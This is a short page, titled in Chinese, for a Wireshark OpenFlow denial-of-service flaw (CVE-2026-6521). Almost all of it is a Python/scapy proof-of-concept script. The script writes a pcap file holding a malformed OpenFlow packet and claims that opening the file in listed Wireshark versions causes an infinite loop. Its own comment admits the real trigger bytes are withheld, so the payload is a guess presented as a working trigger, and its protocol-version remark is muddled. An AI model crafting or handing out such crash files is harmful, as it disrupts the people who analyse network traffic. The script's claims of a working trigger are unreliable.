CVE-2026-6521 Wireshark OpenFlow拒绝服务漏洞

#!/usr/bin/env python3 """ PoC for CVE-2026-6521 (Wireshark OpenFlow v5 Infinite Loop) This script generates a pcap file with a malformed OpenFlow v5 packet. Usage: python3 poc.py and open the generated 'cve_2026_6521.pcap' in vulnerable Wireshark. """ from scapy.all import * # Construct a raw packet mimicking an OpenFlow v5 message # The specific bytes required to trigger the infinite loop are obfuscated # in the advisory, but this structure targets the OpenFlow dissector. # Ethernet Layer eth = Ether(dst="00:11:22:33:44:55", src="00:aa:bb:cc:dd:ee") # IP Layer ip = IP(src="192.168.1.100", dst="192.168.1.200") # TCP Layer (Standard OpenFlow port) tcp = TCP(sport=12345, dport=6653) # Malformed Payload (Simulated OpenFlow v5 Header) # Version: 0x05 (OpenFlow 1.3+ or newer experimental), Type: 0x00 # Length: Malformed to cause parsing issue payload = Raw(b'\x05\x00\xFF\xFF\x00\x00\x00\x01' + b'A' * 200) packet = eth / ip / tcp / payload # Save to pcap wrpcap('cve_2026_6521.pcap', packet) print("[+] PoC file generated: cve_2026_6521.pcap") print("[+] Open this file in Wireshark 4.6.0-4.6.4 or 4.4.0-4.4.14 to trigger the DoS.")